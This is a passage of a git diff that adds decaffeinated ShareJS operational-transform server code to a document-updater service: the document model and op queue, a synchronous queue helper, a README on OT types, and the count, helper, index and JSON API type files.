+ for (const oldOp of Array.from(ops)) { + // Dup detection works by sending the id(s) the op has been submitted with previously. + // If the id matches, we reject it. The client can also detect the op has been submitted + // already if it sees its own previous id in the ops it sees when it does catchup. + if ( + oldOp.meta.source && + opData.dupIfSource && + Array.from(opData.dupIfSource).includes(oldOp.meta.source) + ) { + return callback('Op already submitted') + } + + opData.op = doc.type.transform(opData.op, oldOp.op, 'left') + opData.v++ + } + profile.log('transform', { sync: true }).end() + } catch (error1) { + error = error1 + return callback(error.message) + } + } + + try { + const profile = new Profiler('model.apply') + snapshot = doc.type.apply(doc.snapshot, opData.op) + profile.log('model.apply', { sync: true }).end() + } catch (error2) { + error = error2 + return callback(error.message) + } + + if ( + options.maxDocLength != null && + doc.snapshot.length > options.maxDocLength + ) { + return callback('Update takes doc over max doc size') + } + + // The op data should be at the current version, and the new document data should be at + // the next version. + // + // This should never happen in practice, but its a nice little check to make sure everything + // is hunky-dory. + if (opData.v !== doc.v) { + // This should never happen. + console.error( + 'Version mismatch detected in model. File a ticket - this is a bug.' + ) + console.error(`Expecting ${opData.v} == ${doc.v}`) + return callback('Internal error') + } + + // newDocData = {snapshot, type:type.name, v:opVersion + 1, meta:docData.meta} + const writeOp = + (db != null ? db.writeOp : undefined) || + ((docName, newOpData, callback) => callback()) + + return writeOp(docName, opData, function (error) { + if (error) { + // The user should probably know about this. + console.warn(`Error writing ops to database: ${error}`) + return callback(error) + } + + __guardMethod__(options.stats, 'writeOp', o => o.writeOp()) + + // This is needed when we emit the 'change' event, below. + const oldSnapshot = doc.snapshot + + // All the heavy lifting is now done. Finally, we'll update the cache with the new data + // and (maybe!) save a new document snapshot to the database. + + doc.v = opData.v + 1 + doc.snapshot = snapshot + + doc.ops.push(opData) + if (db && doc.ops.length > options.numCachedOps) { + doc.ops.shift() + } + + model.emit('applyOp', docName, opData, snapshot, oldSnapshot) + doc.eventEmitter.emit('op', opData, snapshot, oldSnapshot) + + // The callback is called with the version of the document at which the op was applied. + // This is the op.v after transformation, and its doc.v - 1. + callback(null, opData.v) + + // I need a decent strategy here for deciding whether or not to save the snapshot. + // + // The 'right' strategy looks something like "Store the snapshot whenever the snapshot + // is smaller than the accumulated op data". For now, I'll just store it every 20 + // ops or something. (Configurable with doc.committedVersion) + if ( + !doc.snapshotWriteLock && + doc.committedVersion + options.opsBeforeCommit <= doc.v + ) { + return tryWriteSnapshot(docName, function (error) { + if (error) { + return console.warn( + `Error writing snapshot ${error}. This is nonfatal` + ) + } + }) + } + }) + }) + }) + + // Add the data for the given docName to the cache. The named document shouldn't already + // exist in the doc set. + // + // Returns the new doc. 
+ const add = function (docName, error, data, committedVersion, ops, dbMeta) { + let callback, doc + const callbacks = awaitingGetSnapshot[docName] + delete awaitingGetSnapshot[docName] + + if (error) { + if (callbacks) { + for (callback of Array.from(callbacks)) { + callback(error) + } + } + } else { + doc = docs[docName] = { + snapshot: data.snapshot, + v: data.v, + type: data.type, + meta: data.meta, + + // Cache of ops + ops: ops || [], + + eventEmitter: new EventEmitter(), + + // Timer before the document will be invalidated from the cache (if the document has no + // listeners) + reapTimer: null, + + // Version of the snapshot thats in the database + committedVersion: committedVersion != null ? committedVersion : data.v, + snapshotWriteLock: false, + dbMeta, + } + + doc.opQueue = makeOpQueue(docName, doc) + + refreshReapingTimeout(docName) + model.emit('add', docName, data) + if (callbacks) { + for (callback of Array.from(callbacks)) { + callback(null, doc) + } + } + } + + return doc + } + + // This is a little helper wrapper around db.getOps. It does two things: + // + // - If there's no database set, it returns an error to the callback + // - It adds version numbers to each op returned from the database + // (These can be inferred from context so the DB doesn't store them, but its useful to have them). + const getOpsInternal = function (docName, start, end, callback) { + if (!db) { + return typeof callback === 'function' + ? callback('Document does not exist') + : undefined + } + + return db.getOps(docName, start, end, function (error, ops) { + if (error) { + return typeof callback === 'function' ? callback(error) : undefined + } + + let v = start + for (const op of Array.from(ops)) { + op.v = v++ + } + + return typeof callback === 'function' ? callback(null, ops) : undefined + }) + } + + // Load the named document into the cache. This function is re-entrant. + // + // The callback is called with (error, doc) + const load = function (docName, callback) { + if (docs[docName]) { + // The document is already loaded. Return immediately. + __guardMethod__(options.stats, 'cacheHit', o => o.cacheHit('getSnapshot')) + return callback(null, docs[docName]) + } + + // We're a memory store. If we don't have it, nobody does. + if (!db) { + return callback('Document does not exist') + } + + const callbacks = awaitingGetSnapshot[docName] + + // The document is being loaded already. Add ourselves as a callback. + if (callbacks) { + return callbacks.push(callback) + } + + __guardMethod__(options.stats, 'cacheMiss', o1 => + o1.cacheMiss('getSnapshot') + ) + + // The document isn't loaded and isn't being loaded. Load it. + awaitingGetSnapshot[docName] = [callback] + return db.getSnapshot(docName, function (error, data, dbMeta) { + if (error) { + return add(docName, error) + } + + const type = types[data.type] + if (!type) { + console.warn(`Type '${data.type}' missing`) + return callback('Type not found') + } + data.type = type + + const committedVersion = data.v + + // The server can close without saving the most recent document snapshot. + // In this case, there are extra ops which need to be applied before + // returning the snapshot. 
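+      // e.g. (illustrative): if the saved snapshot is at v=100 but ops
+      // 100..102 were written before shutdown, the three ops are re-applied
+      // below and the loaded doc ends up at v=103.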
+ return getOpsInternal(docName, data.v, null, function (error, ops) { + if (error) { + return callback(error) + } + + if (ops.length > 0) { + console.log(`Catchup ${docName} ${data.v} -> ${data.v + ops.length}`) + + try { + for (const op of Array.from(ops)) { + data.snapshot = type.apply(data.snapshot, op.op) + data.v++ + } + } catch (e) { + // This should never happen - it indicates that whats in the + // database is invalid. + console.error(`Op data invalid for ${docName}: ${e.stack}`) + return callback('Op data invalid') + } + } + + model.emit('load', docName, data) + return add(docName, error, data, committedVersion, ops, dbMeta) + }) + }) + } + + // This makes sure the cache contains a document. If the doc cache doesn't contain + // a document, it is loaded from the database and stored. + // + // Documents are stored so long as either: + // - They have been accessed within the past #{PERIOD} + // - At least one client has the document open + function refreshReapingTimeout(docName) { + const doc = docs[docName] + if (!doc) { + return + } + + // I want to let the clients list be updated before this is called. + return process.nextTick(function () { + // This is an awkward way to find out the number of clients on a document. If this + // causes performance issues, add a numClients field to the document. + // + // The first check is because its possible that between refreshReapingTimeout being called and this + // event being fired, someone called delete() on the document and hence the doc is something else now. + if ( + doc === docs[docName] && + doc.eventEmitter.listeners('op').length === 0 && + (db || options.forceReaping) && + doc.opQueue.busy === false + ) { + let reapTimer + clearTimeout(doc.reapTimer) + return (doc.reapTimer = reapTimer = + setTimeout( + () => + tryWriteSnapshot(docName, function () { + // If the reaping timeout has been refreshed while we're writing the snapshot, or if we're + // in the middle of applying an operation, don't reap. + if ( + docs[docName].reapTimer === reapTimer && + doc.opQueue.busy === false + ) { + return delete docs[docName] + } + }), + options.reapTime + )) + } + }) + } + + function tryWriteSnapshot(docName, callback) { + if (!db) { + return typeof callback === 'function' ? callback() : undefined + } + + const doc = docs[docName] + + // The doc is closed + if (!doc) { + return typeof callback === 'function' ? callback() : undefined + } + + // The document is already saved. + if (doc.committedVersion === doc.v) { + return typeof callback === 'function' ? callback() : undefined + } + + if (doc.snapshotWriteLock) { + return typeof callback === 'function' + ? callback('Another snapshot write is in progress') + : undefined + } + + doc.snapshotWriteLock = true + + __guardMethod__(options.stats, 'writeSnapshot', o => o.writeSnapshot()) + + const writeSnapshot = + (db != null ? db.writeSnapshot : undefined) || + ((docName, docData, dbMeta, callback) => callback()) + + const data = { + v: doc.v, + meta: doc.meta, + snapshot: doc.snapshot, + // The database doesn't know about object types. + type: doc.type.name, + } + + // Commit snapshot. + return writeSnapshot(docName, data, doc.dbMeta, function (error, dbMeta) { + doc.snapshotWriteLock = false + + // We have to use data.v here because the version in the doc could + // have been updated between the call to writeSnapshot() and now. + doc.committedVersion = data.v + doc.dbMeta = dbMeta + + return typeof callback === 'function' ? 
callback(error) : undefined
+    })
+  }
+
+  // *** Model interface methods
+
+  // Create a new document.
+  //
+  // data should be {snapshot, type, [meta]}. The version of a new document is 0.
+  this.create = function (docName, type, meta, callback) {
+    if (typeof meta === 'function') {
+      ;[meta, callback] = Array.from([{}, meta])
+    }
+
+    if (docName.match(/\//)) {
+      return typeof callback === 'function'
+        ? callback('Invalid document name')
+        : undefined
+    }
+    if (docs[docName]) {
+      return typeof callback === 'function'
+        ? callback('Document already exists')
+        : undefined
+    }
+
+    if (typeof type === 'string') {
+      type = types[type]
+    }
+    if (!type) {
+      return typeof callback === 'function'
+        ? callback('Type not found')
+        : undefined
+    }
+
+    const data = {
+      snapshot: type.create(),
+      type: type.name,
+      meta: meta || {},
+      v: 0,
+    }
+
+    const done = function (error, dbMeta) {
+      // dbMeta can be used to cache extra state needed by the database to access the document, like an ID or something.
+      if (error) {
+        return typeof callback === 'function' ? callback(error) : undefined
+      }
+
+      // From here on we'll store the object version of the type name.
+      data.type = type
+      add(docName, null, data, 0, [], dbMeta)
+      model.emit('create', docName, data)
+      return typeof callback === 'function' ? callback() : undefined
+    }
+
+    if (db) {
+      return db.create(docName, data, done)
+    } else {
+      return done()
+    }
+  }
+
+  // Permanently deletes the specified document.
+  // If listeners are attached, they are removed.
+  //
+  // The callback is called with (error) if there was an error. If error is null / undefined, the
+  // document was deleted.
+  //
+  // WARNING: This isn't well supported throughout the code. (Eg, streaming clients aren't told about the
+  // deletion. Subsequent op submissions will fail).
+  this.delete = function (docName, callback) {
+    const doc = docs[docName]
+
+    if (doc) {
+      clearTimeout(doc.reapTimer)
+      delete docs[docName]
+    }
+
+    const done = function (error) {
+      if (!error) {
+        model.emit('delete', docName)
+      }
+      return typeof callback === 'function' ? callback(error) : undefined
+    }
+
+    if (db) {
+      return db.delete(docName, doc != null ? doc.dbMeta : undefined, done)
+    } else {
+      return done(!doc ? 'Document does not exist' : undefined)
+    }
+  }
+
+  // This gets all operations from [start...end]. (That is, it's not inclusive.)
+  //
+  // end can be null. This means 'get me all ops from start'.
+  //
+  // Each op returned is in the form {op:o, meta:m, v:version}.
+  //
+  // Callback is called with (error, [ops])
+  //
+  // If the document does not exist, getOps doesn't necessarily return an error. This is because
+  // it's awkward to figure out whether or not the document exists for things
+  // like the redis database backend. I guess it's a bit gross having this inconsistent
+  // with the other DB calls, but it's certainly convenient.
+  //
+  // Use getVersion() to determine if a document actually exists, if that's what you're
+  // after.
+  this.getOps = getOps = function (docName, start, end, callback) {
+    // getOps will only use the op cache if it's there. It won't fill the op cache in.
+    if (!(start >= 0)) {
+      throw new Error('start must be 0+')
+    }
+
+    if (typeof end === 'function') {
+      ;[end, callback] = Array.from([null, end])
+    }
+
+    const ops = docs[docName] != null ? docs[docName].ops : undefined
+
+    if (ops) {
+      const version = docs[docName].v
+
+      // Ops contains an array of ops. 
The last op in the list is the last op applied + if (end == null) { + end = version + } + start = Math.min(start, end) + + if (start === end) { + return callback(null, []) + } + + // Base is the version number of the oldest op we have cached + const base = version - ops.length + + // If the database is null, we'll trim to the ops we do have and hope thats enough. + if (start >= base || db === null) { + refreshReapingTimeout(docName) + if (options.stats != null) { + options.stats.cacheHit('getOps') + } + + return callback(null, ops.slice(start - base, end - base)) + } + } + + if (options.stats != null) { + options.stats.cacheMiss('getOps') + } + + return getOpsInternal(docName, start, end, callback) + } + + // Gets the snapshot data for the specified document. + // getSnapshot(docName, callback) + // Callback is called with (error, {v: <version>, type: <type>, snapshot: <snapshot>, meta: <meta>}) + this.getSnapshot = (docName, callback) => + load(docName, (error, doc) => + callback( + error, + doc + ? { v: doc.v, type: doc.type, snapshot: doc.snapshot, meta: doc.meta } + : undefined + ) + ) + + // Gets the latest version # of the document. + // getVersion(docName, callback) + // callback is called with (error, version). + this.getVersion = (docName, callback) => + load(docName, (error, doc) => + callback(error, doc != null ? doc.v : undefined) + ) + + // Apply an op to the specified document. + // The callback is passed (error, applied version #) + // opData = {op:op, v:v, meta:metadata} + // + // Ops are queued before being applied so that the following code applies op C before op B: + // model.applyOp 'doc', OPA, -> model.applyOp 'doc', OPB + // model.applyOp 'doc', OPC + this.applyOp = ( + docName, + opData, + callback // All the logic for this is in makeOpQueue, above. + ) => + load(docName, function (error, doc) { + if (error) { + return callback(error) + } + + return process.nextTick(() => + doc.opQueue(opData, function (error, newVersion) { + refreshReapingTimeout(docName) + return typeof callback === 'function' + ? callback(error, newVersion) + : undefined + }) + ) + }) + + // TODO: store (some) metadata in DB + // TODO: op and meta should be combineable in the op that gets sent + this.applyMetaOp = function (docName, metaOpData, callback) { + const { path, value } = metaOpData.meta + + if (!isArray(path)) { + return typeof callback === 'function' + ? callback('path should be an array') + : undefined + } + + return load(docName, function (error, doc) { + if (error != null) { + return typeof callback === 'function' ? callback(error) : undefined + } else { + let applied = false + switch (path[0]) { + case 'shout': + doc.eventEmitter.emit('op', metaOpData) + applied = true + break + } + + if (applied) { + model.emit('applyMetaOp', docName, path, value) + } + return typeof callback === 'function' + ? callback(null, doc.v) + : undefined + } + }) + } + + // Listen to all ops from the specified version. If version is in the past, all + // ops since that version are sent immediately to the listener. + // + // The callback is called once the listener is attached, but before any ops have been passed + // to the listener. + // + // This will _not_ edit the document metadata. + // + // If there are any listeners, we don't purge the document from the cache. But be aware, this behaviour + // might change in a future version. + // + // version is the document version at which the document is opened. It can be left out if you want to open + // the document at the most recent version. 
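+  //
+  // (Editor's sketch, illustration only; `render` is a hypothetical consumer:
+  //   model.listen('doc', 0, opData => render(opData), (error, v) => { ... })
+  // replays ops 0..current through the listener after attaching it, then
+  // streams each newly applied op live.)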
+ // + // listener is called with (opData) each time an op is applied. + // + // callback(error, openedVersion) + this.listen = function (docName, version, listener, callback) { + if (typeof version === 'function') { + ;[version, listener, callback] = Array.from([null, version, listener]) + } + + return load(docName, function (error, doc) { + if (error) { + return typeof callback === 'function' ? callback(error) : undefined + } + + clearTimeout(doc.reapTimer) + + if (version != null) { + return getOps(docName, version, null, function (error, data) { + if (error) { + return typeof callback === 'function' ? callback(error) : undefined + } + + doc.eventEmitter.on('op', listener) + if (typeof callback === 'function') { + callback(null, version) + } + return (() => { + const result = [] + for (const op of Array.from(data)) { + let needle + listener(op) + + // The listener may well remove itself during the catchup phase. If this happens, break early. + // This is done in a quite inefficient way. (O(n) where n = #listeners on doc) + if ( + ((needle = listener), + !Array.from(doc.eventEmitter.listeners('op')).includes(needle)) + ) { + break + } else { + result.push(undefined) + } + } + return result + })() + }) + } else { + // Version is null / undefined. Just add the listener. + doc.eventEmitter.on('op', listener) + return typeof callback === 'function' + ? callback(null, doc.v) + : undefined + } + }) + } + + // Remove a listener for a particular document. + // + // removeListener(docName, listener) + // + // This is synchronous. + this.removeListener = function (docName, listener) { + // The document should already be loaded. + const doc = docs[docName] + if (!doc) { + throw new Error('removeListener called but document not loaded') + } + + doc.eventEmitter.removeListener('op', listener) + return refreshReapingTimeout(docName) + } + + // Flush saves all snapshot data to the database. I'm not sure whether or not this is actually needed - + // sharejs will happily replay uncommitted ops when documents are re-opened anyway. + this.flush = function (callback) { + if (!db) { + return typeof callback === 'function' ? callback() : undefined + } + + let pendingWrites = 0 + + for (const docName in docs) { + const doc = docs[docName] + if (doc.committedVersion < doc.v) { + pendingWrites++ + // I'm hoping writeSnapshot will always happen in another thread. + tryWriteSnapshot(docName, () => + process.nextTick(function () { + pendingWrites-- + if (pendingWrites === 0) { + return typeof callback === 'function' ? callback() : undefined + } + }) + ) + } + } + + // If nothing was queued, terminate immediately. + if (pendingWrites === 0) { + return typeof callback === 'function' ? callback() : undefined + } + } + + // Close the database connection. This is needed so nodejs can shut down cleanly. + this.closeDb = function () { + __guardMethod__(db, 'close', o => o.close()) + return (db = null) + } +} + +// Model inherits from EventEmitter. 
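+// (Editor's note: this is what lets callers subscribe to the model-level
+// events emitted above, e.g.
+//   model.on('create', (docName, data) => { ... })
+//   model.on('applyOp', (docName, opData, snapshot, oldSnapshot) => { ... })
+// with the signatures used by the emit calls in this file.)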
+Model.prototype = new EventEmitter() + +function __guardMethod__(obj, methodName, transform) { + if ( + typeof obj !== 'undefined' && + obj !== null && + typeof obj[methodName] === 'function' + ) { + return transform(obj, methodName) + } else { + return undefined + } +} diff --git a/services/document-updater/app/js/sharejs/server/syncqueue.js b/services/document-updater/app/js/sharejs/server/syncqueue.js new file mode 100644 index 0000000..7795923 --- /dev/null +++ b/services/document-updater/app/js/sharejs/server/syncqueue.js @@ -0,0 +1,60 @@ +// TODO: This file was created by bulk-decaffeinate. +// Sanity-check the conversion and remove this comment. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// A synchronous processing queue. The queue calls process on the arguments, +// ensuring that process() is only executing once at a time. +// +// process(data, callback) _MUST_ eventually call its callback. +// +// Example: +// +// queue = require 'syncqueue' +// +// fn = queue (data, callback) -> +// asyncthing data, -> +// callback(321) +// +// fn(1) +// fn(2) +// fn(3, (result) -> console.log(result)) +// +// ^--- async thing will only be running once at any time. + +module.exports = function (process) { + if (typeof process !== 'function') { + throw new Error('process is not a function') + } + const queue = [] + + const enqueue = function (data, callback) { + queue.push([data, callback]) + return flush() + } + + enqueue.busy = false + + function flush() { + if (enqueue.busy || queue.length === 0) { + return + } + + enqueue.busy = true + const [data, callback] = Array.from(queue.shift()) + return process(data, function (...result) { + // TODO: Make this not use varargs - varargs are really slow. + enqueue.busy = false + // This is called after busy = false so a user can check if enqueue.busy is set in the callback. + if (callback) { + callback.apply(null, result) + } + return flush() + }) + } + + return enqueue +} diff --git a/services/document-updater/app/js/sharejs/types/README.md b/services/document-updater/app/js/sharejs/types/README.md new file mode 100644 index 0000000..22e6884 --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/README.md @@ -0,0 +1,48 @@ +This directory contains all the operational transform code. Each file defines a type. + +Most of the types in here are for testing or demonstration. The only types which are sent to the webclient +are `text` and `json`. + + +# An OT type + +All OT types have the following fields: + +`name`: _(string)_ Name of the type. Should match the filename. +`create() -> snapshot`: Function which creates and returns a new document snapshot + +`apply(snapshot, op) -> snapshot`: A function which creates a new document snapshot with the op applied +`transform(op1, op2, side) -> op1'`: OT transform function. + +Given op1, op2, `apply(s, op2, transform(op1, op2, 'left')) == apply(s, op1, transform(op2, op1, 'right'))`. + +Transform and apply must never modify their arguments. + + +Optional properties: + +`tp2`: _(bool)_ True if the transform function supports TP2. This allows p2p architectures to work. +`compose(op1, op2) -> op`: Create and return a new op which has the same effect as op1 + op2. 
+`serialize(snapshot) -> JSON object`: Serialize a document to something we can JSON.stringify()
+`deserialize(object) -> snapshot`: Deserialize a JSON object into the document's internal snapshot format
+`prune(op1', op2, side) -> op1`: Inverse transform function. Only required for TP2 types.
+`normalize(op) -> op`: Fix up an op to make it valid. Eg, remove skips of size zero.
+`api`: _(object)_ Set of helper methods which will be mixed into the client document object for manipulating documents. See below.
+
+
+# Examples
+
+`count` and `simple` are two trivial OT type definitions if you want to take a look. JSON defines
+the ot-for-JSON type (see the wiki for documentation) and all the text types define different text
+implementations. (I still have no idea which one I like the most, and they're fun to write!)
+
+
+# API
+
+Types can also define API functions. These methods are mixed into the client's Doc object when a document is created.
+You can use them to help construct ops programmatically (so users don't need to understand how ops are structured).
+
+For example, the three text types defined here (text, text-composable and text-tp2) all provide the text API, supplying
+`.insert()`, `.del()`, `.getLength` and `.getText` methods.
+
+See text-api.js for an example.
diff --git a/services/document-updater/app/js/sharejs/types/count.js b/services/document-updater/app/js/sharejs/types/count.js
new file mode 100644
index 0000000..246f6b7
--- /dev/null
+++ b/services/document-updater/app/js/sharejs/types/count.js
@@ -0,0 +1,37 @@
+// TODO: This file was created by bulk-decaffeinate.
+// Sanity-check the conversion and remove this comment.
+/*
+ * decaffeinate suggestions:
+ * DS101: Remove unnecessary use of Array.from
+ * DS102: Remove unnecessary code created because of implicit returns
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+// This is a simple type used for testing other OT code. Each op is [expectedSnapshot, increment]
+
+exports.name = 'count'
+exports.create = () => 1
+
+exports.apply = function (snapshot, op) {
+  const [v, inc] = Array.from(op)
+  if (snapshot !== v) {
+    throw new Error(`Op ${v} != snapshot ${snapshot}`)
+  }
+  return snapshot + inc
+}
+
+// transform op1 by op2. Return transformed version of op1.
+exports.transform = function (op1, op2) {
+  if (op1[0] !== op2[0]) {
+    throw new Error(`Op1 ${op1[0]} != op2 ${op2[0]}`)
+  }
+  return [op1[0] + op2[1], op1[1]]
+}
+
+exports.compose = function (op1, op2) {
+  if (op1[0] + op1[1] !== op2[0]) {
+    throw new Error(`Op1 ${op1} + 1 != op2 ${op2}`)
+  }
+  return [op1[0], op1[1] + op2[1]]
+}
+
+exports.generateRandomOp = doc => [[doc, 1], doc + 1]
diff --git a/services/document-updater/app/js/sharejs/types/helpers.js b/services/document-updater/app/js/sharejs/types/helpers.js
new file mode 100644
index 0000000..0342655
--- /dev/null
+++ b/services/document-updater/app/js/sharejs/types/helpers.js
@@ -0,0 +1,116 @@
+/* eslint-disable
+  no-return-assign,
+  no-unused-vars,
+*/
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
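+// (Editor's illustration, not part of the original commit: the convergence
+// property documented in types/README.md, checked with the trivial 'count'
+// type from count.js above; both orders of transformed application must
+// reach the same snapshot:
+//
+//   const count = require('./count')
+//   const s = count.create() // 1
+//   const op1 = [1, 10] // "expect snapshot 1, add 10"
+//   const op2 = [1, 2] // "expect snapshot 1, add 2"
+//   const a = count.apply(count.apply(s, op2), count.transform(op1, op2))
+//   const b = count.apply(count.apply(s, op1), count.transform(op2, op1))
+//   // a === b === 13
+// )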
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// These methods let you build a transform function from a transformComponent function +// for OT types like text and JSON in which operations are lists of components +// and transforming them requires N^2 work. + +// Add transform and transformX functions for an OT type which has transformComponent defined. +// transformComponent(destination array, component, other component, side) +let bootstrapTransform +exports._bt = bootstrapTransform = function ( + type, + transformComponent, + checkValidOp, + append +) { + let transformX + const transformComponentX = function (left, right, destLeft, destRight) { + transformComponent(destLeft, left, right, 'left') + return transformComponent(destRight, right, left, 'right') + } + + // Transforms rightOp by leftOp. Returns ['rightOp', clientOp'] + type.transformX = + type.transformX = + transformX = + function (leftOp, rightOp) { + checkValidOp(leftOp) + checkValidOp(rightOp) + + const newRightOp = [] + + for (let rightComponent of Array.from(rightOp)) { + // Generate newLeftOp by composing leftOp by rightComponent + const newLeftOp = [] + + let k = 0 + while (k < leftOp.length) { + let l + const nextC = [] + transformComponentX(leftOp[k], rightComponent, newLeftOp, nextC) + k++ + + if (nextC.length === 1) { + rightComponent = nextC[0] + } else if (nextC.length === 0) { + for (l of Array.from(leftOp.slice(k))) { + append(newLeftOp, l) + } + rightComponent = null + break + } else { + // Recurse. + const [l_, r_] = Array.from(transformX(leftOp.slice(k), nextC)) + for (l of Array.from(l_)) { + append(newLeftOp, l) + } + for (const r of Array.from(r_)) { + append(newRightOp, r) + } + rightComponent = null + break + } + } + + if (rightComponent != null) { + append(newRightOp, rightComponent) + } + leftOp = newLeftOp + } + + return [leftOp, newRightOp] + } + + // Transforms op with specified type ('left' or 'right') by otherOp. + return (type.transform = type.transform = + function (op, otherOp, type) { + let _ + if (type !== 'left' && type !== 'right') { + throw new Error("type must be 'left' or 'right'") + } + + if (otherOp.length === 0) { + return op + } + + // TODO: Benchmark with and without this line. I _think_ it'll make a big difference...? + if (op.length === 1 && otherOp.length === 1) { + return transformComponent([], op[0], otherOp[0], type) + } + + if (type === 'left') { + let left + ;[left, _] = Array.from(transformX(op, otherOp)) + return left + } else { + let right + ;[_, right] = Array.from(transformX(otherOp, op)) + return right + } + }) +} + +if (typeof WEB === 'undefined') { + exports.bootstrapTransform = bootstrapTransform +} diff --git a/services/document-updater/app/js/sharejs/types/index.js b/services/document-updater/app/js/sharejs/types/index.js new file mode 100644 index 0000000..7e3d6bb --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/index.js @@ -0,0 +1,25 @@ +// TODO: This file was created by bulk-decaffeinate. +// Sanity-check the conversion and remove this comment. 
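+// (Editor's sketch, illustration only: after the register() calls below run,
+// consumers look types up by name on this module's exports, e.g.
+//   const types = require('./index')
+//   const text = types.text // the registered text OT type
+// and each type's optional './<name>-api' mixin has already been required.)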
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ + +const register = function (file) { + const type = require(file) + exports[type.name] = type + try { + return require(`${file}-api`) + } catch (error) {} +} + +// Import all the built-in types. +register('./simple') +register('./count') + +register('./text') +register('./text-composable') +register('./text-tp2') + +register('./json') diff --git a/services/document-updater/app/js/sharejs/types/json-api.js b/services/document-updater/app/js/sharejs/types/json-api.js new file mode 100644 index 0000000..e591f66 --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/json-api.js @@ -0,0 +1,356 @@ +/* eslint-disable + no-undef, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// API for JSON OT + +let json +if (typeof WEB === 'undefined') { + json = require('./json') +} + +if (typeof WEB !== 'undefined' && WEB !== null) { + const { extendDoc } = exports + exports.extendDoc = function (name, fn) { + SubDoc.prototype[name] = fn + return extendDoc(name, fn) + } +} + +const depath = function (path) { + if (path.length === 1 && path[0].constructor === Array) { + return path[0] + } else { + return path + } +} + +class SubDoc { + constructor(doc, path) { + this.doc = doc + this.path = path + } + + at(...path) { + return this.doc.at(this.path.concat(depath(path))) + } + + get() { + return this.doc.getAt(this.path) + } + + // for objects and lists + set(value, cb) { + return this.doc.setAt(this.path, value, cb) + } + + // for strings and lists. 
+ insert(pos, value, cb) { + return this.doc.insertAt(this.path, pos, value, cb) + } + + // for strings + del(pos, length, cb) { + return this.doc.deleteTextAt(this.path, length, pos, cb) + } + + // for objects and lists + remove(cb) { + return this.doc.removeAt(this.path, cb) + } + + push(value, cb) { + return this.insert(this.get().length, value, cb) + } + + move(from, to, cb) { + return this.doc.moveAt(this.path, from, to, cb) + } + + add(amount, cb) { + return this.doc.addAt(this.path, amount, cb) + } + + on(event, cb) { + return this.doc.addListener(this.path, event, cb) + } + + removeListener(l) { + return this.doc.removeListener(l) + } + + // text API compatibility + getLength() { + return this.get().length + } + + getText() { + return this.get() + } +} + +const traverse = function (snapshot, path) { + const container = { data: snapshot } + let key = 'data' + let elem = container + for (const p of Array.from(path)) { + elem = elem[key] + key = p + if (typeof elem === 'undefined') { + throw new Error('bad path') + } + } + return { elem, key } +} + +const pathEquals = function (p1, p2) { + if (p1.length !== p2.length) { + return false + } + for (let i = 0; i < p1.length; i++) { + const e = p1[i] + if (e !== p2[i]) { + return false + } + } + return true +} + +json.api = { + provides: { json: true }, + + at(...path) { + return new SubDoc(this, depath(path)) + }, + + get() { + return this.snapshot + }, + set(value, cb) { + return this.setAt([], value, cb) + }, + + getAt(path) { + const { elem, key } = traverse(this.snapshot, path) + return elem[key] + }, + + setAt(path, value, cb) { + const { elem, key } = traverse(this.snapshot, path) + const op = { p: path } + if (elem.constructor === Array) { + op.li = value + if (typeof elem[key] !== 'undefined') { + op.ld = elem[key] + } + } else if (typeof elem === 'object') { + op.oi = value + if (typeof elem[key] !== 'undefined') { + op.od = elem[key] + } + } else { + throw new Error('bad path') + } + return this.submitOp([op], cb) + }, + + removeAt(path, cb) { + const { elem, key } = traverse(this.snapshot, path) + if (typeof elem[key] === 'undefined') { + throw new Error('no element at that path') + } + const op = { p: path } + if (elem.constructor === Array) { + op.ld = elem[key] + } else if (typeof elem === 'object') { + op.od = elem[key] + } else { + throw new Error('bad path') + } + return this.submitOp([op], cb) + }, + + insertAt(path, pos, value, cb) { + const { elem, key } = traverse(this.snapshot, path) + const op = { p: path.concat(pos) } + if (elem[key].constructor === Array) { + op.li = value + } else if (typeof elem[key] === 'string') { + op.si = value + } + return this.submitOp([op], cb) + }, + + moveAt(path, from, to, cb) { + const op = [{ p: path.concat(from), lm: to }] + return this.submitOp(op, cb) + }, + + addAt(path, amount, cb) { + const op = [{ p: path, na: amount }] + return this.submitOp(op, cb) + }, + + deleteTextAt(path, length, pos, cb) { + const { elem, key } = traverse(this.snapshot, path) + const op = [{ p: path.concat(pos), sd: elem[key].slice(pos, pos + length) }] + return this.submitOp(op, cb) + }, + + addListener(path, event, cb) { + const l = { path, event, cb } + this._listeners.push(l) + return l + }, + removeListener(l) { + const i = this._listeners.indexOf(l) + if (i < 0) { + return false + } + this._listeners.splice(i, 1) + return true + }, + _register() { + this._listeners = [] + this.on('change', function (op) { + return (() => { + const result = [] + for (const c of Array.from(op)) { + let i + if (c.na 
